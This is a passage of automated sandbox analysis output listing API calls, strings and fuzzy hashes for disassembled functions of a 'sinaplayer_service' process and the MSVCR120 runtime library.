                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: memmove$Xlength_error@std@@Xout_of_range@std@@memcpy
                                                                                                                                                                                                    • String ID: invalid string position$string too long
                                                                                                                                                                                                    • API String ID: 2530380750-4289949731
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ReadProcessMemory.KERNEL32(?,0039013A,?,00000008,00000000,?,00000000,?,?,?,?,0039013A,?,?), ref: 0038FA90
                                                                                                                                                                                                    • ReadProcessMemory.KERNEL32(?,?,0039013A,00000004,00000000,?,?,?,0039013A,?,?,?,?,?,8285FFAB,00000000), ref: 0038FAA6
                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(verifier.dll), ref: 0038FAC2
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,VerifierEnumerateResource), ref: 0038FAD8
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 0038FB2E
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: MemoryProcessRead$??3@AddressLibraryLoadProc
                                                                                                                                                                                                    • String ID: VerifierEnumerateResource$verifier.dll
                                                                                                                                                                                                    • API String ID: 239842728-3762872906
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,?,?,?,003764FB,00000000,?,?,?,?,?,00379620,?,0039E338), ref: 0037E226
                                                                                                                                                                                                    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(string too long,6C6C52C0,?,?,?,003764FB,00000000,?,?,?,?,?,00379620,?,0039E338), ref: 0037E23E
                                                                                                                                                                                                    • memmove.MSVCR120(00379620,00379620,E8FFFFFF,?,00000000,6C6C52C0,?,?,?,003764FB,00000000,?,?,?), ref: 0037E298
                                                                                                                                                                                                    • memcpy.MSVCR120(E8FFFFFF,?,E8FFFFFF,?,00000000,6C6C52C0,?,?,?,003764FB,00000000,?,?,?), ref: 0037E2BD
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Xlength_error@std@@Xout_of_range@std@@memcpymemmove
                                                                                                                                                                                                    • String ID: 89$invalid string position$string too long
                                                                                                                                                                                                    • API String ID: 1110030134-3118988713
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?FromSeconds@TimeDelta@base@@SA?AV12@_J@Z.BASE(?,00000003,?,?,Function_0000B110,?,?,00000003,?,8285FFAB), ref: 0037C569
                                                                                                                                                                                                    • ?GetProgramCounter@tracked_objects@@YAPBXXZ.BASE ref: 0037C57D
                                                                                                                                                                                                    • ??0Location@tracked_objects@@QAE@PBD0HPBX@Z.BASE(UploadMgr::StatTimeout,upload_mgr.cpp,00000113,00000000), ref: 0037C596
                                                                                                                                                                                                    • ?PostDelayedTask@MessageLoop@base@@QAEXABVLocation@tracked_objects@@ABV?$Callback@$$A6AXXZ@2@VTimeDelta@2@@Z.BASE(?,00000000,?,?), ref: 0037C5BC
                                                                                                                                                                                                    • ??1CallbackBase@internal@base@@IAE@XZ.BASE ref: 0037C5CC
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Location@tracked_objects@@Time$Base@internal@base@@CallbackCallback@$$Counter@tracked_objects@@DelayedDelta@2@@Delta@base@@FromLoop@base@@MessagePostProgramSeconds@Task@V12@_Z@2@
                                                                                                                                                                                                    • String ID: UploadMgr::StatTimeout$upload_mgr.cpp
                                                                                                                                                                                                    • API String ID: 1939080572-324091720
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_Init@locale@std@@CAPAV_Locimp@12@_N@Z.MSVCP120(00000000,8285FFAB,?,?), ref: 0038D20B
                                                                                                                                                                                                    • ??0_Locinfo@std@@QAE@HPBD@Z.MSVCP120(?,00000000), ref: 0038D226
                                                                                                                                                                                                    • ?_Makeloc@_Locimp@locale@std@@CAPAV123@ABV_Locinfo@3@HPAV123@PBV23@@Z.MSVCP120(?,?,?,00000000), ref: 0038D278
                                                                                                                                                                                                    • ??1_Locinfo@std@@QAE@XZ.MSVCP120 ref: 0038D284
                                                                                                                                                                                                    • ?_Xruntime_error@std@@YAXPBD@Z.MSVCP120(bad locale name), ref: 0038D2AD
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(00000000,00000000), ref: 0038D2CD
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Locinfo@std@@V123@$??0_??1_ExceptionInit@locale@std@@Locimp@12@_Locimp@locale@std@@Locinfo@3@Makeloc@_ThrowV23@@Xruntime_error@std@@
                                                                                                                                                                                                    • String ID: bad locale name
                                                                                                                                                                                                    • API String ID: 2630998926-1405518554
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • HttpQueryInfoW.WININET(?,?,00000000,?,00000000), ref: 00372F5C
                                                                                                                                                                                                    • HttpQueryInfoW.WININET(?,?,00000000,?,00000000), ref: 00372FAF
                                                                                                                                                                                                    • ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ.MSVCP120(00000000,-00000002), ref: 00372FED
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00372FF6
                                                                                                                                                                                                    • ?SysWideToNativeMB@base@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@3@@Z.BASE(?,?), ref: 00373003
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 00373015
                                                                                                                                                                                                      • Part of subcall function 00374790: memset.MSVCR120 ref: 003747B0
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??3@HttpInfoQueryU?$char_traits@$B@base@@D@2@@std@@D@std@@D@std@@@std@@NativeU?$char_traits@_Unlock@?$basic_streambuf@V?$allocator@V?$allocator@_V?$basic_string@V?$basic_string@_W@2@@3@@W@std@@Widememset
                                                                                                                                                                                                    • String ID: `qml
                                                                                                                                                                                                    • API String ID: 3854038836-3674608353
                                                                                                                                                                                                    • Opcode ID: 38afac1c1012bfad68876f7e8b2eed0fcfd7f317557f3ce62d8be683b7d1f540
                                                                                                                                                                                                    • Instruction ID: 260b5dbe989f3d7ef110477d7e2ce73366e64fd2316219c909829a2d859f8772
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 38afac1c1012bfad68876f7e8b2eed0fcfd7f317557f3ce62d8be683b7d1f540
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CA416BB1900248EBDF16DF94DC45BEEBBB8FF09314F144119F816A7290DB796944CBA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?GetProgramCounter@tracked_objects@@YAPBXXZ.BASE(00000000,00000000,?,?,?,?,?,00000000,?,00000001,00000000,0039A9DB,000000FF), ref: 00388322
                                                                                                                                                                                                    • ??0Location@tracked_objects@@QAE@PBD0HPBX@Z.BASE(net::FileStream::Context::CloseAndDelete,network_change\file_stream_context.cc,000000EF,00000000,?,?,?,?,?,00000000,?,00000001,00000000,0039A9DB,000000FF), ref: 0038833B
                                                                                                                                                                                                    • ?PostTaskAndReply@TaskRunner@base@@QAE_NABVLocation@tracked_objects@@ABV?$Callback@$$A6AXXZ@2@1@Z.BASE(00000000,?,?,?,?,?,00000000,?,00000001,00000000,0039A9DB,000000FF), ref: 00388344
                                                                                                                                                                                                    • ??1CallbackBase@internal@base@@IAE@XZ.BASE(?,?,?,?,?,00000000,?,00000001,00000000,0039A9DB,000000FF), ref: 00388357
                                                                                                                                                                                                    • ??1CallbackBase@internal@base@@IAE@XZ.BASE(?,?,?,?,?,00000000,?,00000001,00000000,0039A9DB,000000FF), ref: 00388363
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • network_change\file_stream_context.cc, xrefs: 0038832E
                                                                                                                                                                                                    • net::FileStream::Context::CloseAndDelete, xrefs: 00388333
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Base@internal@base@@CallbackLocation@tracked_objects@@Task$Callback@$$Counter@tracked_objects@@PostProgramReply@Runner@base@@Z@2@1@
                                                                                                                                                                                                    • String ID: net::FileStream::Context::CloseAndDelete$network_change\file_stream_context.cc
                                                                                                                                                                                                    • API String ID: 1359539112-1847067397
                                                                                                                                                                                                    • Opcode ID: e3d66fe2a7f28a54d508824c2cba83d83c0cbd4f9a0ff9a52b2ffa2b1a5ee65b
                                                                                                                                                                                                    • Instruction ID: 1784f0f82bdfa7f03565b4fc1a9d961497c32e92cc0b12c5fccafef21febd7ca
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e3d66fe2a7f28a54d508824c2cba83d83c0cbd4f9a0ff9a52b2ffa2b1a5ee65b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A1217E72904258EFCB12DF98DC45BEEBBBCFB09724F10029AE425A32D0D7755904CBA0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00387B90: ??2@YAPAXI@Z.MSVCR120(00000018), ref: 00387BBF
                                                                                                                                                                                                      • Part of subcall function 00387B90: ??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ.BASE ref: 00387BDA
                                                                                                                                                                                                      • Part of subcall function 00387B90: ??0CallbackBase@internal@base@@QAE@ABV012@@Z.BASE(?), ref: 00387BFE
                                                                                                                                                                                                      • Part of subcall function 00387B90: ??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z.BASE(00000000), ref: 00387C15
                                                                                                                                                                                                      • Part of subcall function 00387990: ??2@YAPAXI@Z.MSVCR120(00000010), ref: 003879BF
                                                                                                                                                                                                      • Part of subcall function 00387990: ??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ.BASE ref: 003879DA
                                                                                                                                                                                                      • Part of subcall function 00387990: ??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z.BASE(00000000), ref: 00387A05
                                                                                                                                                                                                    • ?GetProgramCounter@tracked_objects@@YAPBXXZ.BASE(00000000,00000000,?,?,?,8285FFAB), ref: 00388408
                                                                                                                                                                                                    • ??0Location@tracked_objects@@QAE@PBD0HPBX@Z.BASE(net::FileStream::Context::CloseAsync,network_change\file_stream_context.cc,00000074,00000000,?,?,?,8285FFAB), ref: 0038841E
                                                                                                                                                                                                      • Part of subcall function 00387D00: ??2@YAPAXI@Z.MSVCR120(00000010,8285FFAB,?,?,0039B128,000000FF,?,0038842B,?,00000000,?,?,?,8285FFAB), ref: 00387D29
                                                                                                                                                                                                      • Part of subcall function 00387D00: ?PostTaskAndReply@TaskRunner@base@@QAE_NABVLocation@tracked_objects@@ABV?$Callback@$$A6AXXZ@2@1@Z.BASE(0038842B,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0039B128,000000FF), ref: 00387D9D
                                                                                                                                                                                                      • Part of subcall function 00387D00: ??1CallbackBase@internal@base@@IAE@XZ.BASE(?,?,?,?,?,?,?,?,?,?,?,0039B128,000000FF,?,0038842B,?), ref: 00387DB2
                                                                                                                                                                                                      • Part of subcall function 00387D00: ??1CallbackBase@internal@base@@IAE@XZ.BASE(?,?,?,?,?,?,?,?,?,?,?,0039B128,000000FF,?,0038842B,?), ref: 00387DBB
                                                                                                                                                                                                      • Part of subcall function 00387D00: ??3@YAXPAX@Z.MSVCR120(000000FF,?,?,?,?,?,?,?,?,?,?,?,0039B128,000000FF,?,0038842B), ref: 00387DC0
                                                                                                                                                                                                    • ??1CallbackBase@internal@base@@IAE@XZ.BASE(?,?,?,?,?,?,?,8285FFAB), ref: 0038843B
                                                                                                                                                                                                    • ??1CallbackBase@internal@base@@IAE@XZ.BASE(?,?,?,?,?,?,?,8285FFAB), ref: 00388444
                                                                                                                                                                                                    • ??1CallbackBase@internal@base@@IAE@XZ.BASE(?,?,?,?,?,?,?,8285FFAB), ref: 00388450
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • network_change\file_stream_context.cc, xrefs: 00388411
                                                                                                                                                                                                    • net::FileStream::Context::CloseAsync, xrefs: 00388416
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Base@internal@base@@Callback$??2@$Base@12@@Base@subtle@base@@BindCountedLocation@tracked_objects@@SafeStateTaskThread$??3@Callback@$$Counter@tracked_objects@@PostProgramReply@Runner@base@@V012@@Z@2@1@
                                                                                                                                                                                                    • String ID: net::FileStream::Context::CloseAsync$network_change\file_stream_context.cc
                                                                                                                                                                                                    • API String ID: 4200212630-4150499097
                                                                                                                                                                                                    • Opcode ID: 89d88b19818d5a4003bdc57b346add19b7b68a40be6aade1b068feb9b70f9f5a
                                                                                                                                                                                                    • Instruction ID: 8d288fc0bca3b29f6827a33066c0dfccd02b0f209c36d78db26aea621dcacd5f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 89d88b19818d5a4003bdc57b346add19b7b68a40be6aade1b068feb9b70f9f5a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE218271904248EFDB02EF94CD45BDEBBBCEB05314F10429AE815A7281DB759B04CBA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00387B90: ??2@YAPAXI@Z.MSVCR120(00000018), ref: 00387BBF
                                                                                                                                                                                                      • Part of subcall function 00387B90: ??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ.BASE ref: 00387BDA
                                                                                                                                                                                                      • Part of subcall function 00387B90: ??0CallbackBase@internal@base@@QAE@ABV012@@Z.BASE(?), ref: 00387BFE
                                                                                                                                                                                                      • Part of subcall function 00387B90: ??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z.BASE(00000000), ref: 00387C15
                                                                                                                                                                                                      • Part of subcall function 00387990: ??2@YAPAXI@Z.MSVCR120(00000010), ref: 003879BF
                                                                                                                                                                                                      • Part of subcall function 00387990: ??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ.BASE ref: 003879DA
                                                                                                                                                                                                      • Part of subcall function 00387990: ??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z.BASE(00000000), ref: 00387A05
                                                                                                                                                                                                    • ?GetProgramCounter@tracked_objects@@YAPBXXZ.BASE(00000000,00000000,?,?,?,8285FFAB), ref: 00388538
                                                                                                                                                                                                    • ??0Location@tracked_objects@@QAE@PBD0HPBX@Z.BASE(net::FileStream::Context::FlushAsync,network_change\file_stream_context.cc,0000009B,00000000,?,?,?,8285FFAB), ref: 00388551
                                                                                                                                                                                                      • Part of subcall function 00387D00: ??2@YAPAXI@Z.MSVCR120(00000010,8285FFAB,?,?,0039B128,000000FF,?,0038842B,?,00000000,?,?,?,8285FFAB), ref: 00387D29
                                                                                                                                                                                                      • Part of subcall function 00387D00: ?PostTaskAndReply@TaskRunner@base@@QAE_NABVLocation@tracked_objects@@ABV?$Callback@$$A6AXXZ@2@1@Z.BASE(0038842B,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0039B128,000000FF), ref: 00387D9D
                                                                                                                                                                                                      • Part of subcall function 00387D00: ??1CallbackBase@internal@base@@IAE@XZ.BASE(?,?,?,?,?,?,?,?,?,?,?,0039B128,000000FF,?,0038842B,?), ref: 00387DB2
                                                                                                                                                                                                      • Part of subcall function 00387D00: ??1CallbackBase@internal@base@@IAE@XZ.BASE(?,?,?,?,?,?,?,?,?,?,?,0039B128,000000FF,?,0038842B,?), ref: 00387DBB
                                                                                                                                                                                                      • Part of subcall function 00387D00: ??3@YAXPAX@Z.MSVCR120(000000FF,?,?,?,?,?,?,?,?,?,?,?,0039B128,000000FF,?,0038842B), ref: 00387DC0
                                                                                                                                                                                                    • ??1CallbackBase@internal@base@@IAE@XZ.BASE(?,?,?,?,?,?,?,8285FFAB), ref: 0038856E
                                                                                                                                                                                                    • ??1CallbackBase@internal@base@@IAE@XZ.BASE(?,?,?,?,?,?,?,8285FFAB), ref: 00388577
                                                                                                                                                                                                    • ??1CallbackBase@internal@base@@IAE@XZ.BASE(?,?,?,?,?,?,?,8285FFAB), ref: 00388583
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • network_change\file_stream_context.cc, xrefs: 00388544
                                                                                                                                                                                                    • net::FileStream::Context::FlushAsync, xrefs: 00388549
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Base@internal@base@@Callback$??2@$Base@12@@Base@subtle@base@@BindCountedLocation@tracked_objects@@SafeStateTaskThread$??3@Callback@$$Counter@tracked_objects@@PostProgramReply@Runner@base@@V012@@Z@2@1@
                                                                                                                                                                                                    • String ID: net::FileStream::Context::FlushAsync$network_change\file_stream_context.cc
                                                                                                                                                                                                    • API String ID: 4200212630-315462406
                                                                                                                                                                                                    • Opcode ID: 20e65fc73a1fe805a500f124e847a25eed7086a184c37d27359290562d207653
                                                                                                                                                                                                    • Instruction ID: 700d7d583bcbc63883b275231d15abfcb5207843b6898a73b263a8c2964b07bb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 20e65fc73a1fe805a500f124e847a25eed7086a184c37d27359290562d207653
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 28215171904248EEDB02EFA4DD45BDEBBBCEB15314F10429AE815A7281D7759B04CBA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • FindCompleteObject.LIBCMT ref: 6C5EEA15
                                                                                                                                                                                                    • FindMITargetTypeInstance.LIBCMT ref: 6C5EEA4E
                                                                                                                                                                                                      • Part of subcall function 6C5EE634: strcmp.MSVCR120(?,-00000008,?,00000000,00000000), ref: 6C5EE686
                                                                                                                                                                                                      • Part of subcall function 6C5EE634: strcmp.MSVCR120(?,?,?,00000000,00000000), ref: 6C5EE6B4
                                                                                                                                                                                                      • Part of subcall function 6C5EE634: PMDtoOffset.LIBCMT ref: 6C5EE6C6
                                                                                                                                                                                                    • FindVITargetTypeInstance.LIBCMT ref: 6C5EEA55
                                                                                                                                                                                                    • PMDtoOffset.LIBCMT ref: 6C5EEA66
                                                                                                                                                                                                    • std::bad_exception::bad_exception.LIBCMT(Bad dynamic_cast!,?,?,?,?,?,6C5EEAE8,00000018), ref: 6C5EEA8F
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6C5EEB04,Bad dynamic_cast!,?,?,?,?,?,6C5EEAE8,00000018), ref: 6C5EEA9D
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Find$InstanceOffsetTargetTypestrcmp$CompleteExceptionObjectThrowstd::bad_exception::bad_exception
                                                                                                                                                                                                    • String ID: Bad dynamic_cast!
                                                                                                                                                                                                    • API String ID: 3548542081-2956939130
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6C55F764: _getptd.MSVCR120(00000001,00000000,?,6C57E01F,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6C55F77A
                                                                                                                                                                                                    • _strnicoll_l.MSVCR120(?,?,?,?,xL,00ED4598,00ED4C78,00000000,00ED4598,00000000,00000000,00000000), ref: 6C567029
                                                                                                                                                                                                      • Part of subcall function 6C566F4B: __crtCompareStringA.MSVCR120(?,?,00001001,00ED4598,?,?,?,00000000,00000000,?,7FFFFFFF,00000000,?,xL,00ED4598,00ED4C78), ref: 6C566FAF
                                                                                                                                                                                                    • _errno.MSVCR120(xL,00ED4598,00ED4C78,00000000,00ED4598,00000000,00000000,00000000), ref: 6C5A777C
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(xL,00ED4598,00ED4C78,00000000,00ED4598,00000000,00000000,00000000), ref: 6C5A7787
                                                                                                                                                                                                    • _errno.MSVCR120(xL,00ED4598,00ED4C78,00000000,00ED4598,00000000,00000000,00000000), ref: 6C5A7796
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(xL,00ED4598,00ED4C78,00000000,00ED4598,00000000,00000000,00000000), ref: 6C5A77A1
                                                                                                                                                                                                    • __crtCompareStringA.MSVCR120(?,?,00001001,?,?,?,?,?,xL,00ED4598,00ED4C78,00000000,00ED4598,00000000,00000000,00000000), ref: 6C5A77C1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CompareString__crt_errno_invalid_parameter_noinfo$_getptd_strnicoll_l
                                                                                                                                                                                                    • String ID: xL
                                                                                                                                                                                                    • API String ID: 1228067600-2859553101
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: fprintf$_wfopen_sfclosefputs
                                                                                                                                                                                                    • String ID: %d$GBP1
                                                                                                                                                                                                    • API String ID: 2869316018-3547967902
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • malloc.MSVCR120(?), ref: 6C55EE1A
                                                                                                                                                                                                      • Part of subcall function 6C55ED30: HeapAlloc.KERNEL32(00EB0000,00000000,6C5CC0AD,00000000,?,00000000,?,6C56223C,6C5CC0AD,6C633B90,6C633B90,?,?,6C5CC0AD,?,00000000), ref: 6C55ED5D
                                                                                                                                                                                                    • _callnewh.MSVCR120(?), ref: 6C5ADA32
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?,00000001), ref: 6C5ADA50
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6C57C7FC,?,00000001), ref: 6C5ADA65
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,?,6C5A3D3A,00000000,6C561782,6C5CB407,?,6C5CBD2C,00000003,6C5A3BC7,6C564630,00000008,6C57C625,?), ref: 6C5ADA6C
                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,6C5A3D3A,00000000,6C561782,6C5CB407,?,6C5CBD2C,00000003,6C5A3BC7,6C564630,00000008,6C57C625,?), ref: 6C5ADA73
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocErrorExceptionHeapLastThrow_callnewh_errnomallocstd::exception::exception
                                                                                                                                                                                                    • String ID: bad allocation
                                                                                                                                                                                                    • API String ID: 2319598913-2104205924
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000002,00000180,6C5648CA), ref: 6C5769E4
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000008,00000002,00000180,6C5648CA), ref: 6C5769F5
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(00000001,00000002,00000180,6C5648CA), ref: 6C5A345B
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(6C5648CA,6C62D088,00000001,00000002,00000180), ref: 6C5A3470
                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 6C5A3476
                                                                                                                                                                                                    • GetThreadPriority.KERNEL32(00000000), ref: 6C5A347D
                                                                                                                                                                                                    Strings
